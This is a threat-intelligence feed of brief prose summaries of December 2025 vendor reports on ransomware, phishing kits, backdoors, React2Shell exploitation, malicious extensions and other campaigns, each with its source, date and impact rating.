- Binary Defense provides a technical walkthrough of methods for analyzing malware written in the Rust programming language, focusing on compiler behavior, embedded strings, build artifacts, and techniques for recovering entry points in unknown Rust binaries . The report explains how Rust’s lack of a stable ABI, extensive compiler-inserted safety checks, and dependency embedding introduce analytical challenges for defenders. It then demonstrates these techniques on a single unknown Rust sample, revealing its use of HTTP libraries and common Rust runtime initialization patterns but without attributing it to any threat actor or campaign. The report highlights that Rust-based malware is becoming more prevalent due to its cross-platform capabilities and lower detection rates compared to traditional languages. The content is intended to improve analyst proficiency rather than describe an active intrusion or actor behaviors.
Gentlemen_Ransomware_Global_Dual_Extortion_Surge
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- Gentlemen_Ransomware_Global_Dual_Extortion_Surge
- Date of Scan:
- 2025-12-17
- Impact:
- HIGH
- Summary:
- Researchers at ASEC have identified a new ransomware group known as Gentlemen, first observed in August 2025. The group employs a double extortion model, breaching enterprise networks to exfiltrate and encrypt sensitive data before using it for leverage against victims. Written in the Go programming language, the ransomware demonstrates a high level of sophistication through features such as disabling security services, halting backup and database processes, and leveraging Group Policy Object (GPO) manipulation during lateral movement. Execution is restricted via a password argument to prevent analysis in unintended environments, indicating strong operational discipline.
BlackForce_Phishing_Kit
HIGH
+
—
- Intel Source:
- Zscaler
- Intel Name:
- BlackForce_Phishing_Kit
- Date of Scan:
- 2025-12-16
- Impact:
- HIGH
- Summary:
- Researchers at Zscaler have identified BlackForce, a commercial phishing kit designed to steal login credentials in real time and bypass multi-factor authentication for widely used online services. The kit is sold on underground forums and distributed through phishing pages that closely replicate legitimate brand login screens. When a user clicks a lure link, BlackForce first verifies that the visitor is a real person—rather than an automated scanner or security researcher before presenting the fraudulent login page. Victims are prompted to enter their username, password, and, in many cases, a one-time authentication code. This information is immediately transmitted to the attacker, who uses an interactive control panel to inject additional fake prompts into the victim’s browser and replay the captured data on the legitimate service to seize the account. All stolen information is ultimately routed to a backend system that can forward the data to messaging channels for operator use.
React2Shell_Multi_Actor_Espionage_Cryptomining
LOW
+
—
- Intel Source:
- Google Threat Intelligence Group
- Intel Name:
- React2Shell_Multi_Actor_Espionage_Cryptomining
- Date of Scan:
- 2025-12-16
- Impact:
- LOW
- Summary:
- Google Threat Intelligence Group (GTIG) reports widespread exploitation of the React2Shell vulnerability (CVE-2025-55182), an unauthenticated RCE flaw in React Server Components used by frameworks such as Next.js . Multiple distinct threat clusters, primarily China-nexus plus at least one Iran-nexus group, are leveraging the bug to deploy tunneling tools, backdoors, and cryptocurrency miners. China-linked cluster UNC6600 uses the flaw to drop the MINOCAT tunneler, gaining persistent covert access to Linux hosts through cron, systemd services, and shell configuration injection. Another China-nexus cluster, UNC6586, deploys the SNOWLIGHT downloader component of the VSHELL backdoor framework, using staged HTTP retrieval of additional payloads disguised as benign files. UNC6588 uses the same vulnerability to distribute the COMPOOD backdoor masquerading as common tools such as Vim, while UNC6603 deploys an updated HISONIC backdoor that hides its configuration behind mainstream cloud services. Cluster UNC6595 installs ANGRYREBEL.LINUX, disguising it as the system’s SSH daemon and applying timestomping and shell history clearing for anti-forensics. In parallel, financially motivated actors rapidly weaponize the vulnerability to install XMRig miners, establishing persistence through new systemd services. Overall, CVE-2025-55182 is enabling both espionage and profit-driven activity against unpatched React/Next.js workloads at global scale.
PeerBlight_Linux_Backdoor
MEDIUM
+
—
- Intel Source:
- Huntress
- Intel Name:
- PeerBlight_Linux_Backdoor
- Date of Scan:
- 2025-12-15
- Impact:
- MEDIUM
- Summary:
- Researchers at Huntress have discovered that threat actors are exploiting a critical vulnerability in React Server Components to achieve remote code execution on internet-facing applications, then deploy a newly identified Linux backdoor, dubbed PeerBlight, alongside cryptocurrency mining payloads. PeerBlight enables persistent remote access and supports command execution, file manipulation, and tunneling, allowing attackers to maintain full control of compromised servers long after the initial intrusion. After gaining access, the attackers establish new services and disguise malicious processes to ensure persistence. They also deploy auxiliary tooling that facilitates reverse proxying, SOCKS tunneling, and unauthorized user account creation, enabling long-term footholds in victim environments. PeerBlight’s command-and-control channel features encrypted communications, a domain generation algorithm, and a peer-to-peer fallback layer built on BitTorrent DHT. This multi-layered design significantly increases the resilience of the attacker’s infrastructure against traditional blocking or domain takedown efforts.
CastleRAT
MEDIUM
+
—
- Intel Source:
- Splunk
- Intel Name:
- CastleRAT
- Date of Scan:
- 2025-12-14
- Impact:
- MEDIUM
- Summary:
- Researchers at Splunk have discovered a new remote access trojan (RAT) called CastleRAT, which comes in both Python and C-based versions. It provides attackers extensive control and surveillance capabilities on compromised Windows machines. Once installed, it gathers detailed system information and uses various plugins to capture clipboard data, keystrokes, screenshots, and even audio and video from connected devices. CastleRAT can hijack browser sessions, maintain persistence via rundll32 and scheduled tasks, and bypass UAC by abusing trusted binaries. it employs masquerading techniques and uses “dead drop” locations on legitimate websites to retrieve configuration updates and commands. Altogether, these capabilities make CastleRAT a powerful post-compromise tool that can support credential theft, espionage, and further intrusion once attackers have initial access to a system.
Famous_Chollima_DPRK_IT_Worker_Infiltration
HIGH
+
—
- Intel Source:
- Any.Run
- Intel Name:
- Famous_Chollima_DPRK_IT_Worker_Infiltration
- Date of Scan:
- 2025-12-14
- Impact:
- HIGH
- Summary:
- Researchers at ANY.RUN and NorthScan have identified an ongoing campaign by the Lazarus Group’s Famous Chollima division, which infiltrates Western organizations by posing as legitimate freelance IT workers. The operation employs large-scale social engineering through GitHub, LinkedIn, and Telegram, where DPRK operators masquerade as developers or recruiters to gain employment and internal access to company systems. Once trust is established, victims are persuaded to install remote access software, allowing adversaries full control over their systems and sensitive credentials. The investigation, conducted within a controlled sandbox environment, revealed consistent use of commercial VPNs, browser automation extensions, and identity theft tactics to blend malicious activity with legitimate workflows. Targeting primarily the IT, financial, cryptocurrency, e-commerce, and healthcare sectors, the group seeks to generate revenue and facilitate espionage for the North Korean regime.
Cracking_ValleyRAT
HIGH
+
—
- Intel Source:
- CheckPoint
- Intel Name:
- Cracking_ValleyRAT
- Date of Scan:
- 2025-12-14
- Impact:
- HIGH
- Summary:
- Check Point researchers have uncovered ValleyRAT, a modular Windows backdoor supported by a comprehensive development ecosystem that includes a GUI-based builder, multiple plugins, and a customized kernel-mode rootkit. The builder generates customized ValleyRAT payloads by allowing operators to select capabilities such as remote desktop control, file and process management, credential harvesting, and host monitoring. A central component is the kernel driver, derived from open-source code but extensively modified to conceal the malware, safeguard its user-mode components, and disrupt with security tooling. It manipulates process structures, hides operational artifacts, and stores configuration data in the registry using make analysis difficult.
BRAT_Hijacker_Browser_Manipulation_Malware
MEDIUM
+
—
- Intel Source:
- G-DATA
- Intel Name:
- BRAT_Hijacker_Browser_Manipulation_Malware
- Date of Scan:
- 2025-12-13
- Impact:
- MEDIUM
- Summary:
- Researchers at G DATA CyberDefense have identified a series of browser hijacking techniques used by multiple malware families that target Chromium-based browsers and Firefox. The investigation highlights three distinct mechanisms of compromise, revealing how modern hijackers maintain persistence and evade detection. The first technique involves tampering with browser preference files—such as Chrome’s Secure Preferences or Firefox’s prefs.js—to alter default settings like homepage or search engine configurations, bypassing integrity checks through regenerated HMAC values derived from system data. The second, named BRAT (browser remote access tool), demonstrates the use of automated keystroke emulation to remotely control browser interactions, enabling actions such as tab navigation, clipboard exfiltration, and forced redirections. The third technique leverages a combination of PowerShell and VBScript to disable Chrome’s auto-update policy and install unauthorized extensions via deprecated command-line switches, effectively preventing remediation through normal software updates. Collectively, these techniques show a progression from configuration tampering to full browser automation, representing a growing threat vector that blends persistence, user deception, and credential theft potential.
MoneyMount_ISO_Phantom_Stealer_via_ISO_Files
HIGH
+
—
- Intel Source:
- Seqrite Labs
- Intel Name:
- MoneyMount_ISO_Phantom_Stealer_via_ISO_Files
- Date of Scan:
- 2025-12-13
- Impact:
- HIGH
- Summary:
- Researchers at Seqrite Labs have identified an ongoing phishing campaign, dubbed Operation MoneyMount-ISO, that delivers the Phantom Stealer malware through malicious ISO-mounted executables. The campaign, originating from Russia, employs payment-confirmation–themed phishing emails written in Russian and designed to impersonate legitimate financial correspondence. The attached ZIP archive contains an ISO image that mounts automatically and executes a disguised payload, leading to the deployment of Phantom Stealer. Once active, the malware conducts multi-stage data theft operations, including credential extraction from browsers, Discord token harvesting, cryptocurrency wallet exfiltration, and clipboard and keylogging surveillance. Technical analysis indicates that the malware leverages steganography, anti-virtualization checks, and self-deletion routines to evade detection. Data exfiltration is achieved through multiple channels such as Telegram bots, Discord webhooks, and FTP servers, highlighting a sophisticated exfiltration architecture.
React2Shell_RCE_Exploitation_Campaign
HIGH
+
—
- Intel Source:
- Sophos
- Intel Name:
- React2Shell_RCE_Exploitation_Campaign
- Date of Scan:
- 2025-12-12
- Impact:
- HIGH
- Summary:
- Researchers at Sophos Counter Threat Unit (CTU) have identified widespread exploitation of CVE-2025-55182, a critical remote code execution vulnerability in React Server Components, referred to as React2Shell. The flaw stems from unsafe deserialization of network requests in the React “Flight” protocol, allowing attackers to send a single malicious HTTP request to execute arbitrary JavaScript on affected servers without authentication. Exploitation activity has been observed targeting versions 19.0.0 through 19.2.0 of React, with numerous compromised systems deploying multi-stage Linux loaders designed for persistence via cron jobs, systemd, and rc.local. Sophos analysts report that these payloads included obfuscated JavaScript components using AES-256-CBC encryption to conceal follow-on malware and anti-forensic measures to delete installer traces.
Gogs_RCE_Bypass_Actively_Exploited
HIGH
+
—
- Intel Source:
- WIZ
- Intel Name:
- Gogs_RCE_Bypass_Actively_Exploited
- Date of Scan:
- 2025-12-12
- Impact:
- HIGH
- Summary:
- Researchers at Wiz have identified active exploitation of a previously unknown vulnerability in Gogs, a self-hosted Git service. The flaw, tracked as CVE-2025-8110, is a symbolic link bypass that reopens a remote code execution vector thought to be patched under CVE-2024-55947. The vulnerability allows authenticated users to overwrite files outside the repository directory, enabling arbitrary command execution through modification of Git configuration files. Wiz’s investigation began after detecting malware on a customer’s cloud workload, which was traced to this Gogs zero-day. The threat actor leveraged open registration features and API misuse to compromise exposed instances, with over half of observed Gogs servers showing infection signs.
NANOREMOTE_Windows_Backdoor
MEDIUM
+
—
- Intel Source:
- Elastic Security Labs
- Intel Name:
- NANOREMOTE_Windows_Backdoor
- Date of Scan:
- 2025-12-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Elastic Security Labs have uncovered a new Windows backdoor called NANOREMOTE, delivered through a deceptive loader known as WMLOADER, which masquerades as legitimate security software. The developers behind this tool appear to be the same espionage-focused group previously associated with the FINALDRAFT implant, as indicated by overlapping code and shared cryptographic routines. Once deployed, NANOREMOTE provides attackers with extensive remote-access capabilities, including command execution, host reconnaissance, file manipulation, and in-memory execution of additional payloads. Its flexible beaconing and task-based architecture enable sustained, interactive operations. To evade detection, the malware leverages Google Drive and other common cloud services for payload staging and data exfiltration, allowing its traffic to blend seamlessly with legitimate network activity. WMLOADER further enhances stealth by using an invalid code signature and encrypted shellcode to evade basic security controls.
Fake_AI_Pages_Drop_AMOS_Malware
MEDIUM
+
—
- Intel Source:
- Huntress
- Intel Name:
- Fake_AI_Pages_Drop_AMOS_Malware
- Date of Scan:
- 2025-12-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Huntress have uncovered an AMOS Stealer campaign that uses AI-themed troubleshooting pages and search-engine manipulation to lure macOS users. The attack begins when users search for routine Mac maintenance help and are directed to attacker-controlled pages mimicking AI assistants like ChatGPT or Grok. Within these fake chat interfaces, victims are instructed to run benign Terminal commands that actually download and execute a hidden stealer loader. Once active, the malware silently collects system credentials, browser data, and cryptocurrency wallet information while avoiding any visible signs of installation. It persists using standard macOS mechanisms—including LaunchDaemons and user-level watchdog scripts—ensuring it re-launches after reboots or termination attempts. The stealer also checks for virtual machine environments before fully deploying and exfiltrates stolen data to attacker-controlled servers. This campaign exploits user trust in search results, AI chat interfaces, and copy-paste workflows, targeting everyday macOS users, particularly those handling cryptocurrency or sensitive browser-based accounts.
PA_Email_Compromise_via_Malicious_PDFs
MEDIUM
+
—
- Intel Source:
- CERT AGID
- Intel Name:
- PA_Email_Compromise_via_Malicious_PDFs
- Date of Scan:
- 2025-12-11
- Impact:
- MEDIUM
- Summary:
- Researchers at CERT-AGID have identified an ongoing phishing campaign targeting Italian Public Administration (PA) entities through the use of compromised institutional email accounts. The attackers leverage these accounts to distribute convincing emails containing malicious PDF attachments that appear to be legitimate document notifications. When recipients open the attached PDF, they are prompted to click a “Review Documents” button, which redirects them to a genuine Figma login page, exploiting the platform’s legitimacy to collect user credentials. Once the victim attempts to authenticate using an email or Google account, the attackers gain access to real user identifiers and potentially sensitive login information. CERT-AGID confirmed that two PA administrations have been compromised so far, with further spread not ruled out.
EtherRAT_DPRK_Ethereum_implant_via_React2Shell
LOW
+
—
- Intel Source:
- Sysdig Threat Research Team
- Intel Name:
- EtherRAT_DPRK_Ethereum_implant_via_React2Shell
- Date of Scan:
- 2025-12-11
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team reports EtherRAT, a Node.js-based persistent implant deployed via React2Shell (CVE-2025-55182). The malware uses blockchain-based C2 resolution through Ethereum smart contracts, a four-stage delivery chain, and AES-encrypted payloads. It downloads a legitimate Node.js runtime to reduce detection and installs five Linux persistence mechanisms for durable access. EtherRAT polls nine RPC endpoints for resilient C2 and supports self-updating to evade signatures. While attribution is not confirmed, several techniques overlap with DPRK “Contagious Interview” tooling. The implant provides operators full asynchronous JavaScript execution for continued reconnaissance and tasking
Storm_0249_Shifts_to_Precision_Post_Exploitation
HIGH
+
—
- Intel Source:
- Reliaquest
- Intel Name:
- Storm_0249_Shifts_to_Precision_Post_Exploitation
- Date of Scan:
- 2025-12-10
- Impact:
- HIGH
- Summary:
- ReliaQuest researchers have identified Storm-0249 as a financially motivated initial access broker that has shifted from broad phishing campaigns to more targeted post-exploitation operations aimed at hijacking trusted endpoint security processes. The group leverages a legitimate SentinelOne helper process to sideload a malicious DLL, enabling SYSTEM-level execution and long-term persistence through MSI installers. After delivering these deceptive installers via Microsoft-themed infrastructure, the attackers use curl and PowerShell commands to deploy fileless payloads that execute directly in memory. Once inside a network, Storm-0249 performs extensive host reconnaissance using built-in Windows utilities and registry queries, collecting identifiers such as MachineGuid, which ransomware affiliates can later use to bind encryption keys to specific victims. The group also routes its command-and-control traffic through the same SentinelOne process, causing malicious TLS communications to blend in with legitimate EDR telemetry.
OFLIP_Ransomware
HIGH
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- OFLIP_Ransomware
- Date of Scan:
- 2025-12-10
- Impact:
- HIGH
- Summary:
- Researchers at Palo Alto Networks have uncovered a financially motivated threat group, known as CL-CRI-1036, using a new Rust-based ransomware called OFLIP to target organizations in the Asia-Pacific region. The attackers gain access through manual intrusions and use the Sliver framework for command-and-control and lateral movement across both Windows and Linux environments. The ransomware is designed to work quickly rather than stealthily. It scans available drives, encrypts user files, and drops ransom notes writable directories while excluding specific file types to keep systems functional. After encrypting data, it tries to delete and overwrite its own files to make detection harder. The operators demand payment in cryptocurrency and threaten to leak stolen data on underground forums, although the malware itself has no built-in exfiltration capability, suggesting the use of separate tools or potential bluffing.
BigBlack_Malicious_VS_Code_Extensions
HIGH
+
—
- Intel Source:
- KOI Security
- Intel Name:
- BigBlack_Malicious_VS_Code_Extensions
- Date of Scan:
- 2025-12-10
- Impact:
- HIGH
- Summary:
- Researchers at Koi Security have identified a campaign distributing malicious Visual Studio Code extensions that exfiltrate sensitive developer data through stealthy infostealer payloads. The operation leverages two extensions—one disguised as a cryptocurrency-themed color scheme and another posing as an AI coding assistant—to target developers with varying social engineering lures. Once installed, these extensions execute hidden scripts that download additional payloads capable of capturing screenshots, harvesting WiFi credentials, and stealing browser session tokens. The malware employs DLL hijacking to conceal its activity under legitimate processes, ensuring persistence and evasion of security controls. Analysis of multiple versions revealed iterative refinement by the threat actor, who improved reliability and stealth across updates while maintaining the same command infrastructure and payload delivery chain. Victimology points to software developers and technical professionals, particularly those interested in cryptocurrency or AI-enhanced development tools.
VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT
HIGH
+
—
- Intel Source:
- Hunt.IO
- Intel Name:
- VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT
- Date of Scan:
- 2025-12-09
- Impact:
- HIGH
- Summary:
- Researchers at Hunt.io have uncovered a supply-chain compromise targeting developers through the Visual Studio Code extension ecosystem, where attackers published a fake Prettier extension under a deceptive publisher profile and delivered a staged attack chain involving a VBScript dropper, an Anivia loader and finally the OctoRAT remote access toolkit. The initial payloads were fetched from a public code repository and relied on AES encryption and process hollowing to stay in memory, while Anivia decrypted and executed OctoRAT inside a legitimate .NET system binary to avoid reputation-based defenses. The scans also found multiple active control panels tied together by shared TLS certificate infrastructure and hosted across European providers.
Intellexa_Ongoing_Zero_Day_Exploits_Persist
HIGH
+
—
- Intel Source:
- Google Threat Intelligence
- Intel Name:
- Intellexa_Ongoing_Zero_Day_Exploits_Persist
- Date of Scan:
- 2025-12-09
- Impact:
- HIGH
- Summary:
- Researchers at Google’s Threat Intelligence Group (GTIG) have identified continued offensive cyber operations conducted by the commercial spyware vendor Intellexa, which remains active despite international sanctions and prior exposure. The group has repeatedly developed and deployed zero-day exploit chains targeting major mobile platforms including iOS and Android, often chaining vulnerabilities in Chrome and Safari to achieve remote code execution and privilege escalation. GTIG’s analysis highlights Intellexa’s sustained ability to procure or develop new zero-days rapidly, indicating a robust exploit acquisition network and a high level of technical sophistication. The exploits have been leveraged to deliver Predator spyware, a tool capable of extensive surveillance, including microphone and camera capture, keylogging, and VOIP recording. Recent campaigns have been observed in regions such as Egypt and Saudi Arabia, with delivery mechanisms relying on one-time links and messaging app redirections.
AutoIT3_Loader_Shellcode_via_FileInstall_Abuse
HIGH
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- AutoIT3_Loader_Shellcode_via_FileInstall_Abuse
- Date of Scan:
- 2025-12-09
- Impact:
- HIGH
- Summary:
- Researchers at the SANS Internet Storm Center have identified a renewed wave of malicious activity leveraging AutoIT3-compiled scripts as loaders for shellcode execution. AutoIT3, a Windows automation language, is being abused by threat actors to embed and execute payloads through its FileInstall() function, allowing malicious files to be packed directly into compiled executables. The observed campaigns demonstrate how attackers use this feature to unpack obfuscated payloads into temporary directories and execute them in memory, effectively bypassing traditional endpoint defenses. The scripts employ lightweight obfuscation routines to conceal shellcode loading logic, ultimately invoking Windows API calls such as CallWindowProc() to execute malicious code. This technique has been linked to the distribution of remote access and data theft tools, indicating an adaptable and ongoing use of AutoIT3 as a loader platform.
Shai_Hulud_2_GitHub_NPM_Worm
HIGH
+
—
- Intel Source:
- Trustwave and Iru
- Intel Name:
- Shai_Hulud_2_GitHub_NPM_Worm
- Date of Scan:
- 2025-12-09
- Impact:
- HIGH
- Summary:
- Researchers at Trustwave SpiderLabs and Iru have identified Shai-Hulud 2.0, a sophisticated self-replicating malware targeting the Node Package Manager (NPM) ecosystem and GitHub-based CI/CD pipelines. The threat actors behind this campaign exploited a GitHub Actions injection vulnerability to steal NPM publishing tokens, allowing them to distribute maliciously modified NPM packages. Once installed, the malware executes JavaScript-based payloads that harvest authentication credentials and API tokens from cloud platforms including GitHub, AWS, GCP, and Azure. It also propagates automatically by republishing infected packages under compromised developer accounts. The malware establishes persistence by registering the infected host as a GitHub self-hosted runner and abuses GitHub Discussions as a covert command and control mechanism.
Russian_Actor_Spoofs_European_Security_Events
MEDIUM
+
—
- Intel Source:
- Volexity
- Intel Name:
- Russian_Actor_Spoofs_European_Security_Events
- Date of Scan:
- 2025-12-08
- Impact:
- MEDIUM
- Summary:
- Researchers have identified that the Russian state-linked group UTA0355 is conducting highly targeted phishing campaigns by impersonating legitimate European security and policy conferences. The actors create polished registration websites for events such as the Belgrade Security Conference and use tailored phishing emails along with follow-up conversations over WhatsApp or Signal to draw in selected Microsoft 365 users. Once credentials are obtained, the attackers access mailboxes and files, register new devices in Entra ID to maintain long-term persistence, and route follow-on activity through proxy infrastructure to obscure their location and blend in with normal user behavior. The group also acquires lookalike domains and leverages obscure email services to build additional conference-themed infrastructure, demonstrating strong social-engineering capabilities and an increasingly mature approach to cloud identity abuse.
Gamaredon_Exploits_CVE_2025_8088_in_Phishing
MEDIUM
+
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- Gamaredon_Exploits_CVE_2025_8088_in_Phishing
- Date of Scan:
- 2025-12-08
- Impact:
- MEDIUM
- Summary:
- Researchers at the 360 Threat Intelligence Center have observed that APT-C-53 (Gamaredon), a Russia-aligned espionage group active since at least 2013, is escalating its operations against Ukrainian government and military targets in 2025. The campaign abuses a newly disclosed WinRAR directory-traversal flaw, CVE-2025-8088, to deliver spear-phishing archives that quietly drop HTA malware into the Windows startup folder. When opened, the crafted archive writes a hidden payload to a persistence path that executes at the next login, launching a VBScript downloader that fetches a second-stage script from a remote command server. The second stage uses Gamaredon’s typical multi-layer obfuscation, including string replacement and Base64 decoding, to rebuild modules that collect system information, establish C2 communication, deploy extra persistence techniques, and create disguised scheduled tasks for long-term access.
ShadyPanda_Sleeper_Spyware_Extensions
HIGH
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- ShadyPanda_Sleeper_Spyware_Extensions
- Date of Scan:
- 2025-12-08
- Impact:
- HIGH
- Summary:
- Researchers at Malwarebytes have identified a large-scale spyware campaign leveraging long-dormant Chrome and Edge browser extensions that turned malicious after years of normal behavior. The campaign, linked to the threat group ShadyPanda, affected approximately 4.3 million devices worldwide. Initially published as legitimate tools, the extensions later transformed into a remote code execution platform capable of downloading and executing malicious JavaScript within the browser environment. This allowed attackers to monitor user activity, including visited websites and search queries, and to transmit collected data to infrastructure controlled by actors believed to be operating from China. One of the most widespread extensions, WeTab, accumulated millions of installations before exhibiting malicious behavior.
WARP_PANDA_China_Nexus_vCenter_Intrusions
HIGH
+
—
- Intel Source:
- Crowdstrike
- Intel Name:
- WARP_PANDA_China_Nexus_vCenter_Intrusions
- Date of Scan:
- 2025-12-07
- Impact:
- HIGH
- Summary:
- Researchers at CrowdStrike have identified a newly designated China-nexus threat actor known as WARP PANDA, responsible for multiple intrusions throughout 2025 targeting VMware vCenter and ESXi environments across U.S.-based legal, technology, and manufacturing sectors. The group demonstrates a high degree of technical sophistication and operational security, emphasizing persistence and covert access to compromised cloud and virtualization infrastructure. WARP PANDA employs a custom malware toolkit including BRICKSTORM, Junction, and GuestConduit, all written in Golang and designed for tunneling, persistence, and stealth within virtualized networks. The adversary leverages unregistered virtual machines, file timestamp manipulation, and masquerading as legitimate vCenter processes to evade detection.
JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader
HIGH
+
—
- Intel Source:
- Securonix Threat Research
- Intel Name:
- JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader
- Date of Scan:
- 2025-12-07
- Impact:
- HIGH
- Summary:
- Researchers at Securonix Threat Research have identified a sophisticated multi-stage web-based intrusion campaign known as JSSMUGGLER, which employs advanced obfuscation and stealth techniques to deliver the NetSupport Remote Access Trojan (RAT). The campaign begins with the injection of an obfuscated JavaScript loader into compromised websites, designed to evade detection through junk text, encoded strings, and dynamic runtime execution. Once executed, the loader determines the victim’s environment, using device-aware logic to deliver a secondary HTML Application (HTA) payload executed through mshta.exe. This HTA stage decrypts and executes a PowerShell stager entirely in memory, bypassing standard execution policies and security controls. The final stage deploys the NetSupport RAT, providing the attacker with persistent remote access, file manipulation, keylogging, and surveillance capabilities.
UDPGangster_MuddyWater_Espionage_Campaigns
HIGH
+
—
- Intel Source:
- Fortinet
- Intel Name:
- UDPGangster_MuddyWater_Espionage_Campaigns
- Date of Scan:
- 2025-12-07
- Impact:
- HIGH
- Summary:
- Researchers at FortiGuard Labs have identified a new wave of espionage-focused campaigns conducted by the MuddyWater threat group deploying a UDP-based backdoor known as UDPGangster. The operation employs malicious Microsoft Word documents containing VBA macros to deliver the malware, which executes once victims enable embedded content. The payload uses the Windows API to decode and run concealed data, establishing command and control over UDP to avoid traditional network detection. Once installed, UDPGangster achieves persistence via registry keys and mutex creation while enabling remote code execution, file exfiltration, and payload updates. The malware incorporates extensive anti-analysis measures, including debugger, hardware, and sandbox detection, ensuring it operates only on genuine systems. FortiGuard analysts observed active campaigns targeting government and educational sectors in Turkey, Israel, and Azerbaijan, using localized phishing lures to improve delivery success. The consistency in TTPs, infrastructure, and document macros links the campaigns to MuddyWater’s ongoing regional espionage activity, highlighting a sustained and technically capable threat actor with strong operational security.
SSH_Trojan_via_Government_IP_Compromise
HIGH
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- SSH_Trojan_via_Government_IP_Compromise
- Date of Scan:
- 2025-12-07
- Impact:
- HIGH
- Summary:
- Researchers at the SANS Internet Storm Center (ISC) identified an intrusion involving a sophisticated SSH-based trojan deployment following a brute-force compromise of a honeypot system. The attack began with an automated login attempt using default credentials, after which the threat actor established a brief connection and uploaded a trojan masquerading as a legitimate SSH daemon. Analysis revealed the malware was engineered for persistence, credential harvesting, privilege escalation, and defense evasion, demonstrating a high degree of operational discipline. The malicious activity mapped to multiple MITRE ATT&CK techniques, including valid account abuse, brute-force authentication, and client software compromise. Investigators noted the source IP address originated from a government network, but emphasized this likely reflected a compromised asset rather than direct state involvement.
